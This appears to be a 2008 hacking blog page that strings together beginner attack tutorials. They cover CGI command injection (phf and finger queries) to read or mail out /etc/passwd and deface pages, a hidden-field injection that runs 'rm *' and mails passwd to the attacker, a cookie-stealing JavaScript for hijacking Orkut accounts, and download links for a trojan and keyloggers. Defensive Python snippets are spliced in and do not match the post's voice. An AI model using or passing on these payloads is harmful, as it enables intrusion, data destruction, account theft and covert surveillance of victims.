Saturday, February 23, 2008

Hacking from your Web Browser


I - Introduction

This file will describe several techniques to acquire a password file just by using an ordinary web browser. The information provided will be best described for the beginner hacker, but all hackers should benefit from this information. We will only cover phf in this file, but feel free to explore other programs in the cgi directory such as nph-test-cgi or test-cgi. And now . . . get comfortable… sit back…. and read.

II - Hacking from your Web Browser

There are several techniques in what I call “Web Browser Hacking”. Many beginners don't know that you can query an etc/passwd file from your browser, and in this chapter I will describe all the ways to acquire a passwd file. First you need to find a box that is running the cgi-bin/phf file on their system. A great way to find out without trial and error is to go to www.altavista.com and just search on cgi-bin AND perl.exe or cgi-bin AND phf.

a. Finger box hacking:

Let's say you wanted to break into somewhere like …. hmmmm AOL. The first thing we would do is type in their web site in the URL: http://www.aol.com. The next thing we would do is add /cgi-bin/finger to the web URL so it would look like this: http://www.aol.com/cgi-bin/finger. If the finger gateway is operational, a box should appear for you to enter the name you want to finger. If it is operational you have a chance to receive the etc/passwd file. Next thing you will probably want to do is search for a mailto on the web page… just scan the page for any mailto refs. Go back to the finger box and type in this query…… nobody@nowhere.org ; /bin/mail me@junk.org < etc/passwd …this string takes nobody and emails the passwd file to your email address. If this works you now have the etc/passwd file in your mailbox…. you can now run a crack program against it and have a little fun on their box.

b. The common cgi-bin/phf query:

This section is for the very beginning hacker (all advanced hackers need not apply). Let's take the same scenario from the first example, except in the URL we would type … http://www.aol.com/cgi-bin/phf … if the phf is operational and has not been removed you should get a series of search boxes on the next page (ignore these boxes). To your URL you would add this string: ?Qalias=x%0a/bin/cat%20/etc/passwd… so the entire string would look like this: http://www.aol.com/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd. This string will print out the etc/passwd file straight to your web browser; all you need to do is save it as a file and again run a crack program against it. (This is considering that they are not :*: or :x .)

c. Don't take my cgi form:

This section will explain how to use somebody else’s cgi form to obtain the etc/passwd file. Let's say you look at a document source from a web page and find this in the source:

This is a form to go to Modify





This is a simple form that asks a user to input a message to be sent to a script called doc.pl. Included in the doc.pl script is the following line, which assumes the line has already been parsed out.

system("/usr/lib/sendmail -t $myaddress < $tempfile");

Now let's set up your page:


Hack AOL



value=” ; rm * ;mail -s file youraddress@yourisp.com < /etc/passwd;”>




The semicolons in the hidden value field act as delimiters: they separate the UNIX commands, so that several commands execute on the same line. The system call in Perl creates a UNIX shell, which in this case mails the passwd file to you.
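An added example, not part of the original text and written in Python rather than Perl: it shows how the interpolated string from doc.pl splits into several shell commands once a field contains semicolons, beside an invocation that validates the field and never involves a shell. The function names, the address pattern and the sample values are assumptions made for the illustration.

```python
import re
import shlex
import subprocess

SENDMAIL = "/usr/lib/sendmail"  # path from the doc.pl line quoted on this page
# Assumed field policy: a single plain mailbox and nothing else.
ADDRESS_RE = re.compile(r"[A-Za-z0-9][A-Za-z0-9._+-]*@[A-Za-z0-9-]+(\.[A-Za-z0-9-]+)+")
SEPARATOR_CHARS = set(";&|")  # characters that end one shell command and start another


def shell_commands(myaddress, tempfile):
    """Tokenise the interpolated string roughly as /bin/sh would and
    return one token list per command the shell would run."""
    line = f"{SENDMAIL} -t {myaddress} < {tempfile}"
    lexer = shlex.shlex(line, posix=True, punctuation_chars=True)
    lexer.whitespace_split = True
    commands, current = [], []
    for token in lexer:
        if set(token) <= SEPARATOR_CHARS:
            if current:
                commands.append(current)
            current = []
        else:
            current.append(token)
    if current:
        commands.append(current)
    return commands


def safe_argv(myaddress):
    """Reject anything that is not a plain address, then build an argument
    vector; each element reaches the program verbatim, with no shell parsing."""
    if not ADDRESS_RE.fullmatch(myaddress):
        raise ValueError("rejected address field")
    return [SENDMAIL, "-t", myaddress]


def send_message(myaddress, tempfile):
    """Run the mailer directly; the message file is attached as stdin by the
    caller instead of through a '<' redirect that a shell would interpret."""
    with open(tempfile, "rb") as body:
        return subprocess.run(safe_argv(myaddress), stdin=body, check=True)


# Constructed field values: one ordinary, one carrying command separators.
BENIGN = "user@example.org"
TAINTED = "x@example.org ; echo INJECTED ;"
```

With `BENIGN` the shell sees one command; with `TAINTED` it sees three, and `safe_argv` refuses the value before anything is executed.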



d. Changing web pages from your browser:

This short section will describe the string to use to edit a web page from your web browser. Same scenario as the first section…. http://www.aol.com…. we will then add the following string: cgi-bin/phf?Qalias=x%0a/bin/echo%20 “some text and shit”%20>>filename.html…… This string will allow you to write to filename.html and add “some text and shit”. Note that it has to be in HTML format. You can place text, pictures or whatever you like.
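An added detection example, not from the original text: it scans web server access-log lines for the request shape described in sections b and d, a call to a cgi-bin program with a query parameter that decodes to a newline or another shell metacharacter. The log lines are constructed samples in Common Log Format, and the list of watched programs and the function name are assumptions.

```python
import re
from urllib.parse import unquote, urlsplit

# CGI programs named on this page; extend with a local inventory.
WATCHED = {"phf", "finger", "test-cgi", "nph-test-cgi"}
# Characters a shell treats as command separators, substitutions or redirections.
SHELL_META = re.compile(r"[\n\r;|&<>`$]")
REQUEST = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+)[^"]*" (\d{3})')


def suspicious_requests(lines):
    """Return (client, program, status, parameter) for each flagged log line."""
    hits = []
    for line in lines:
        m = REQUEST.match(line)
        if not m:
            continue
        client, _method, target, status = m.groups()
        parts = urlsplit(target)
        segments = parts.path.lower().split("/")
        if "cgi-bin" not in segments or segments[-1] not in WATCHED:
            continue
        for pair in parts.query.split("&"):
            name, _, value = pair.partition("=")
            # Decode twice so a double-encoded newline (%250a) is still caught.
            decoded = unquote(unquote(value.replace("+", " ")))
            if SHELL_META.search(decoded):
                hits.append((client, segments[-1], int(status), name))
                break
    return hits


# Constructed sample lines (documentation address ranges, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [23/Feb/2008:10:01:02 +0000] "GET /index.html HTTP/1.0" 200 1043',
    '198.51.100.7 - - [23/Feb/2008:10:02:11 +0000] '
    '"GET /cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd HTTP/1.0" 200 2211',
    '198.51.100.7 - - [23/Feb/2008:10:02:40 +0000] '
    '"GET /cgi-bin/phf?Qalias=x%0a/bin/echo%20hi%20>>filename.html HTTP/1.0" 404 210',
    '192.0.2.33 - - [23/Feb/2008:10:05:00 +0000] '
    '"GET /cgi-bin/phf?Qalias=smith HTTP/1.0" 200 812',
]
```

The status code in each hit separates probes against a program that is not installed (404) from requests the server actually handed to the program (200), which are the ones to investigate first.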

III - Conclusion

This information should be able to direct a beginner in obtaining the etc/passwd file from a system using the web browser… It may also give the gurus and advanced hackers some bits of information about Perl and cgi. For further reading check out my second file, which will involve erasing log files from the web browser. I hope you all enjoyed this documentation and found it somewhat interesting…… wake up!!! thus I conclude…..

Modify.

IV - Suggested Reading

Phrack Magazine: Very informative…. covers just about everything from phreaking to hacking…. Just download all the damn articles.

Building Internet Firewalls by O’Reilly & Associates, Inc. aka “The Big Wooden Door”: Covers all kinds of attacks, different firewall solutions, and vulnerabilities.

Perl in 21 days by Samsnet: Good starting book in Perl programming, also covers security issues.

Cgi programming by Samsnet: Good starter for Cgi, but if you don't know Perl or C programming then don't bother; also covers security issues.

new cookies stealing from mozilla firefox to hack


new cookies stealing from mozilla firefox to hack gmail or orkut

"Hacking orkut or Gmail" with the help of cookies, or by stealing the cookies of the victim.
By going through this post I hope you will understand how easy hacking has become with the help of cookies.

By this post you'll be learning cookie stealing and hacking an orkut or Gmail account.

Procedure to hack gmail or orkut through mozilla by stealing cookies:-

1. Firstly you need to have Mozilla Firefox
2. Download the cookie editor plugin for Mozilla Firefox
3. You need to have two fake accounts to hack Orkut or Gmail, so that you receive cookies at one Orkut account and use the other Orkut account for advertising your script. Well, it depends on your choice to have two Gmail (Orkut) accounts


Cookie Script:

javascript:nobody=replyForm;nobody.toUserId.value=33444211;
nobody.scrapText.value=document.cookie;nobody.action='scrapbook.aspx?
Action.submit';nobody.submit()


How to use cookies script?

1. Replace your number "UserId.value=33444211"
How to replace your number:
1. Go to your album
2. Right click on any photo > Properties > 55886645.jpg. It will be an eight digit value.
3. Now replace your value with the value in the JavaScript

Now your script will look like:

javascript:nobody=replyForm;nobody.toUserId.value=yournumber;
nobody.scrapText.value=eval(String.fromCharCode(100,111,99,117,109,101,110,116,46,99,111,111,107,105,101));
nobody.action='Scrapbook.aspx?Action.writeScrapBasic';nobody.submit()

2. Now send this cookie script to the victim and ask him to paste it in the address bar and press Enter
3. You'll get his cookie in your scrap book
4. After getting a cookie go to your orkut home page, then click on the Tools tab and then go to the cookie editor plugin (Tools --> Cookie editor)
5. Click filter/refresh. Look for the 'orkut_state' cookie. Just double click it and replace the orkut_state part with your victim's script
put ur eight digit number in the place of (33444211)

That's it, you're done.
Logout of your orkut and login again and you'll be in your victims Homepage.
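The procedure above depends on two things: page JavaScript can read the session cookie through document.cookie, and the server accepts that cookie value from a second client. An added example, not part of the original post, that checks both from the defender's side: whether a Set-Cookie header issues the session cookie without HttpOnly, and whether one session value is being presented from more than one client address. The header values and request records are constructed samples, and the function names are assumptions.

```python
import hashlib
from collections import defaultdict
from http.cookies import SimpleCookie

SESSION_COOKIE = "orkut_state"  # cookie name taken from this page


def readable_by_script(set_cookie_headers, name=SESSION_COOKIE):
    """Return True if any Set-Cookie header issues `name` without HttpOnly,
    i.e. the value is exposed to document.cookie."""
    for header in set_cookie_headers:
        jar = SimpleCookie()
        jar.load(header)
        if name in jar and not jar[name]["httponly"]:
            return True
    return False


def replayed_sessions(requests, name=SESSION_COOKIE):
    """Map a digest of each session value to the client addresses that sent
    it, keeping only values presented by more than one address."""
    seen = defaultdict(set)
    for client, cookie_header in requests:
        jar = SimpleCookie()
        jar.load(cookie_header)
        if name in jar:
            # Store a digest so the report never contains a usable session value.
            digest = hashlib.sha256(jar[name].value.encode()).hexdigest()[:12]
            seen[digest].add(client)
    return {d: sorted(c) for d, c in seen.items() if len(c) > 1}


# Constructed samples: Set-Cookie values and (client address, Cookie header) pairs.
WEAK = ["orkut_state=CONSTRUCTED-A; Path=/"]
HARDENED = ["orkut_state=CONSTRUCTED-A; Path=/; Secure; HttpOnly"]
REQUESTS = [
    ("192.0.2.10", "orkut_state=CONSTRUCTED-A; lang=en"),
    ("192.0.2.10", "orkut_state=CONSTRUCTED-A"),
    ("203.0.113.77", "orkut_state=CONSTRUCTED-A"),
    ("198.51.100.5", "orkut_state=CONSTRUCTED-B"),
]
```

A change of client address also happens for legitimate reasons such as a mobile network handover, so a hit from `replayed_sessions` is a signal to correlate with other session attributes rather than proof of theft.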

Hacking MSN


A small trick that worked for me, hence posting it here.


Hacking MSN is actually VERY simple. MSN is designed to route the connection through a Microsoft server while you are chatting. However, when a file is sent, a DCC (direct connection) is created. This was purposely done because otherwise Microsoft would waste a lot of bandwidth, so a direct connection is made. This is your chance. Make a file transfer occur between u and a victim (try to send a big file), open up your command prompt (run "cmd" in NT/XP or "command" in 9X to get into prompt) and run netstat. Usually the MSN target's IP would be above port 2000. Enjoy.


If u receive some crap like gux1-43.primus.com as the target, do a reverse DNS lookup on it. However, this occurs very rarely; mostly u will receive a clear IP.

once u have d IP u can do anything with him by Fingerprinting.

U can protect yourself from this occurring to you by using a proxy with MSN (under connections panel in options).

Spreading viruses by ip


rapidshare.com/files/65228555/Chess.exe
download it ..
send it to victim ..
he must run it ..
go to telnet ..
-->run > telnet ..
type o
in
type ip address .. of the victim ..
then if entered correctly ..
it would ask for username and password ..
enter
username:administrator
password:hack

WOOSH !!

u r in the victims PC ..
now u can control his PC using DOS commands ,,

Hacking 100% [ Don't Misuse It ]

Hey hackers. i hav got many requests for a way to hack email accounts. many just wanna play with ur frenz. here comes ur software. this is a keylogger. if u use it properly, it sends all ur fren's text input to u or logs the text onto the computer. plz avoid using this for illegal purposes. if u misuse it.......here are some instructions

1) Try to get the manual from the website of Perfect Keylogger or find
the help file after u finish installing the keylogger

2) BE VERY CAREFUL when installing the keylogger. If u install it with the wrong settings, it will use some funny configurations and stay on the computer forever so make sure u install it properly. Unless u configure it properly, it will hog RAM and slow ur comp.

3) I have no idea on the details of using this thing. Therefore, i would advise all of us to get the manual from the website before attempting anything.

4) For whatever consequences ur actions may lead to, neither me nor this community is responsible. U are using this programme entirely at ur own risk and watever happens, me and the community are not responsible.

5) BE CAREFUL DONT SCREW IT UP

PLZ READ THE ABOVE CAREFULLY BEFORE ANYTHING. THIS IS A DANGEROUS PROGRAMME. USE AT UR OWN RISK.



Perfect Keylogger 1.6.5.0

http://rapidshare.com/files/10758207/Perfect_Keylogger_1.6.5.0.rar


Another Way !

1) The best way is to get a trojan or a keylogger into ur friends computer. Keyloggers log the letters typed and send them to ur email. Trojans steal the input in the "password" field and send them to the hacker(u). I would recommend u to use a keylogger because trojans are illegal and keyloggers are not. Trojan may destroy ur friend's computer and if his Anti-Virus finds it, u may be in trouble. So use a good keylogger like Perfect Keylogger or Keylogger Pro. Install it in ur friend's comp and configure it to send it to u. Be VERY CAREFUL when messing with a keylogger because it can be very infective and can secretly sit in ur computer and hog RAM. I didnt try using keyloggers because i knew it was too risky. This is the best method to hack because it really works

2) Many people in other communities claim to have a very good hacking method.

u want to hack orkut or yahoo id . den just send e-mail on Sallu_ajju@Hotmail.co.in in the following pattern .
Step1:write the e-mail u want to hack.
step2:write ur id
step3:password to ur id
step4:type following code
$65$%5##*()67889#
step6:send it on sallu_ajju@hotmail.co.in
actually this id belongs to one of the officer of msn id maintainance departement. within 24 hours u'l get password .
so enjoy ............


DO NOT FOLLOW THIS METHOD. THIS EMAIL ID IS THE HACKER'S ID. U ARE LITERALLY SENDING UR PASSWORD TO HIM BY USING THIS DAMN METHOD.


3) U have to hack into the mail provider's server (gmail, yahoo, hotmail)

Magic Password Stealer !

Be very careful with this software.. it is a trojan.. and if u want to use this u hav to disable your antivirus and then open it and set it properly and then it will create a file and that file u should not open.. u hav to send it to your frnd and the password will be sent to you when he opens it.. and if u do something wrong your own password will be sent to you.. and next time please dont ask for hacking softwares.. thnx. If it asks for a password, it is 123456 and the username is samjohny4u..

hxxp://rapidshare.com/files/27831681/mps7.zip

Change "xx" to "tt".